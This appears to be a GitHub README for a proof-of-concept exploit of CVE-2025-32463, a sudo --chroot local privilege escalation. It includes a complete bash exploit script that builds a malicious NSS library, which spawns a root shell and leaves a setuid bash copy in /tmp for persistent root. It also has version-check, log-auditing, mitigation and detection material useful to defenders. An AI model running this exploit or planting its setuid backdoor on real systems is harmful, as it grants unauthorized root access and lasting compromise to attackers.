CVE-2025-32463 PoC — Sudo Security Vulnerability

Associated Vulnerability
Title: Sudo Security Vulnerability (CVE-2025-32463)
Description: Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option.
Readme
# CVE-2025-32463 - Sudo Chroot Privilege Escalation Exploit

## Overview

CVE-2025-32463 is a critical local privilege escalation vulnerability in sudo versions 1.9.14 through 1.9.17. This vulnerability allows attackers with sudo privileges to escalate to root access by exploiting a design flaw in the chroot option processing logic.

## Vulnerability Details

- **CVE ID**: CVE-2025-32463
- **Affected Versions**: sudo 1.9.14 - 1.9.17
- **Vulnerability Type**: Local Privilege Escalation (LPE)
- **Severity**: Critical
- **Patched Version**: sudo 1.9.17p1 and later

## Technical Description

The vulnerability is an **ordering flaw in sudo's security validation process**. The `pivot_root` function, which enters the user-supplied chroot, is executed **before the sudoers policy is verified**, so the file system that sudo consults for authentication and authorization during that verification is one the attacker controls.

### Attack Flow

1. **Environment Manipulation**: Attacker creates a controlled chroot environment with malicious `nsswitch.conf`
2. **Library Injection**: Malicious NSS (Name Service Switch) library is placed in the controlled environment
3. **Privilege Escalation**: sudo loads and executes the malicious library with root privileges
4. **Root Access**: Attacker gains full root shell access

### Affected Functions

- `pivot_root`: Executed too early in the process
- `set_cmnd_path`: Operates in the manipulated environment
- `command_matches`: Security checks bypassed due to environment manipulation

## Prerequisites

Before using this exploit, ensure the following conditions are met:

- [ ] Target system runs sudo version 1.9.14 - 1.9.17
- [ ] Current user has sudo privileges
- [ ] sudoers configuration allows chroot operations
- [ ] gcc compiler is available on the target system
- [ ] Write access to temporary directories (e.g., /tmp)

## Usage

### Quick Start

1. Clone this repository:
```
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
```

2. Make the script executable:
```
chmod +x cve-2025-32463.sh
```

3. Run the exploit:
```
./cve-2025-32463.sh
```

### Manual Verification

Check if the target system is vulnerable:

```
# Check sudo version
sudo --version

# Check sudo privileges
sudo -l

# Look for chroot-related permissions
sudo -l | grep chroot
```
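A version check that handles sudo's `p` patch-level suffix correctly, so that 1.9.17 is flagged but 1.9.17p1 is not. This is an added example, not part of the original PoC; it assumes the affected range stated above (1.9.14 through 1.9.17, fixed in 1.9.17p1).

```python
import re

# Affected range as stated above: 1.9.14 through 1.9.17, fixed in 1.9.17p1.
# Versions before 1.9.14 predate the --chroot option and are out of range.
FIRST_AFFECTED = (1, 9, 14, 0)
FIXED = (1, 9, 17, 1)

# Sudo versions look like 1.9.15 or 1.9.17p1; "pN" is a patch level within a release.
_VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)(?:p(\d+))?\b")

def parse_sudo_version(text):
    """Return (major, minor, patch, plevel) from `sudo --version` output, or None.

    A missing 'p' suffix is patch level 0, so (1, 9, 17, 0) sorts before 1.9.17p1.
    """
    m = _VERSION_RE.search(text)
    if m is None:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))

def is_vulnerable(sudo_version_output):
    """True when the reported version lies in [1.9.14, 1.9.17p1)."""
    version = parse_sudo_version(sudo_version_output)
    if version is None:
        raise ValueError("no sudo version string found in output")
    return FIRST_AFFECTED <= version < FIXED

if __name__ == "__main__":
    import subprocess
    out = subprocess.run(["sudo", "--version"], capture_output=True, text=True).stdout
    verdict = "in affected range" if is_vulnerable(out) else "not in affected range"
    print(f"{out.splitlines()[0]}: {verdict}")
```

Distributions frequently backport security fixes without changing the version string, so treat a match as a prompt to check the package changelog rather than as proof of exposure.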

## Exploit Code

The main exploit script (`cve-2025-32463.sh`):

```
#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit

STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>

void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  system("id > /tmp/pwned_proof.txt");
  system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
  execl("/bin/bash", "/bin/bash", NULL);
}
CEOF

mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c

echo "[*] Exploiting CVE-2025-32463..."
echo "[*] Attempting privilege escalation..."
sudo -R pentest pentest

# Cleanup
rm -rf ${STAGE?}
```

## Verification

After successful exploitation, verify root access:

```
# Check current privileges
whoami

# Check proof file
cat /tmp/pwned_proof.txt

# Use setuid bash for persistent root access
/tmp/rootbash -p
```

## Mitigation

### Immediate Actions

1. **Update sudo** to version 1.9.17p1 or later:
   ```
   # Ubuntu/Debian
   sudo apt update && sudo apt upgrade sudo
   
   # CentOS/RHEL
   sudo yum update sudo
   
   # or
   sudo dnf update sudo
   ```

2. **Remove chroot directives** from sudoers (temporary workaround):
   ```
   # Backup current configuration
   sudo cp /etc/sudoers /etc/sudoers.backup
   
   # Remove chroot-related entries. The CHROOT= tag is uppercase in sudoers while
   # the runchroot default is lowercase, so match case-insensitively (GNU sed I flag);
   # repeat for any files under /etc/sudoers.d/
   sudo sed -i '/chroot/Id' /etc/sudoers
   
   # Verify syntax
   sudo visudo -c
   ```

### Detection

Monitor for exploitation attempts:

```
# Check for suspicious temporary directories
find /tmp -name "*.stage.*" -type d

# Monitor sudo logs (RHEL-family systems log to /var/log/secure instead)
tail -f /var/log/auth.log | grep sudo

# Look for NSS library compilation. The script above writes libnss_/<name>.so.2,
# so match the libnss_ directory in the path rather than only the file name
find /tmp -path "*libnss_*" -name "*.so*" -type f
```
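A parser for sudo's log records that flags every invocation carrying a `CHROOT=` field and rates the finding higher when the chroot root resolves into a user-writable tree such as /tmp, which is the condition this vulnerability needs. This is an added example, not part of the original repository; it assumes sudo 1.9's event-log format, in which `-R` adds a `CHROOT=` field, and the sample lines are constructed.

```python
import re

# Match "sudo[pid]: user : KEY=value ; KEY=value ; ..." records and split the fields.
_SUDO_RE = re.compile(r"sudo(?:\[\d+\])?:\s+(\S+)\s+:\s+(.*)$")
_FIELD_RE = re.compile(r"(\w+)=([^;]*?)(?:\s*;\s*|$)")

# Trees an unprivileged user can normally write to: a chroot rooted here means the
# caller controls the /etc/nsswitch.conf that sudo consults. Constructed list.
USER_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

# Constructed sample records (not real captures). Only -R invocations carry CHROOT=.
SAMPLE_LOG = """\
Jul  1 10:02:11 host sudo:    alice : TTY=pts/1 ; CHROOT=pentest ; PWD=/tmp/pentest.stage.Ab12Cd ; USER=root ; COMMAND=pentest
Jul  1 10:03:45 host sudo:      bob : TTY=pts/0 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/bin/apt update
Jul  1 10:05:02 host sudo:    carol : TTY=pts/2 ; CHROOT=/srv/build-root ; PWD=/home/carol ; USER=root ; COMMAND=/bin/ls
Jul  1 10:06:30 host sudo[4242]: pam_unix(sudo:session): session opened for user root
"""

def parse_sudo_record(line):
    """Return (user, {field: value}) for a sudo command record, else None."""
    m = _SUDO_RE.search(line)
    if m is None:
        return None
    user, rest = m.groups()
    return user, {k: v.strip() for k, v in _FIELD_RE.findall(rest)}

def audit_chroot_usage(lines):
    """Flag records that used -R/--chroot, i.e. carry a CHROOT= field.

    A relative chroot is joined to the caller's PWD, since chroot(2) on a relative
    path resolves against the working directory. Severity is 'high' for a root
    inside a user-writable tree, 'medium' otherwise (chroot use is rare anyway).
    """
    findings = []
    for line in lines:
        rec = parse_sudo_record(line)
        if rec is None or "CHROOT" not in rec[1]:
            continue
        user, fields = rec
        root = fields["CHROOT"]
        if not root.startswith("/"):
            root = fields.get("PWD", "").rstrip("/") + "/" + root
        findings.append({
            "user": user,
            "chroot": root,
            "command": fields.get("COMMAND", ""),
            "severity": "high" if root.startswith(USER_WRITABLE_PREFIXES) else "medium",
        })
    return findings

if __name__ == "__main__":
    print(audit_chroot_usage(SAMPLE_LOG.splitlines()))
```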

## Technical Details

### Root Cause Analysis

The vulnerability stems from a **design flaw in sudo's execution flow**:

1. **Normal Expected Flow**:
   - Parse user input
   - Validate sudoers policy
   - Set up environment (including chroot)
   - Execute command

2. **Actual Vulnerable Flow**:
   - Parse user input
   - **Execute chroot (pivot_root) - Problem occurs here**
   - Validate sudoers policy (in manipulated environment)
   - Execute command

### NSS Library Exploitation

The exploit leverages the Name Service Switch (NSS) system:

1. Sudo reads `/etc/nsswitch.conf` for user authentication
2. In the chroot environment, attacker controls this file
3. Malicious NSS library is loaded with root privileges
4. Library constructor executes arbitrary code as root

## Testing Environment

This exploit has been tested on:

- Ubuntu 20.04/22.04 with sudo 1.9.15
- Debian 11/12 with sudo 1.9.14-1.9.17
- CentOS 8/9 with affected sudo versions
- Docker containers with vulnerable sudo installations

## References

- [Official sudo security advisory](https://www.sudo.ws/security/advisories/)
- [Original research by Rich Mirch](https://github.com/kh4sh3i/CVE-2025-32463)
- [Sudo source code analysis](https://github.com/sudo-project/sudo)

## Disclaimer

⚠️ **IMPORTANT DISCLAIMER** ⚠️

This tool is provided for **educational and authorized testing purposes only**. 

- Use only on systems you own or have explicit permission to test
- Unauthorized use of this exploit is illegal and unethical
- The authors are not responsible for any misuse or damage
- Always ensure you have proper authorization before conducting security testing

## Contributing

Contributions are welcome! Please:

1. Fork the repository
2. Create a feature branch
3. Submit a pull request with detailed description

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

## Changelog

### v1.0.0
- Initial release
- Basic exploit functionality
- Comprehensive documentation

---

**Note**: This vulnerability affects a critical system component. Please use responsibly and ensure all testing is authorized.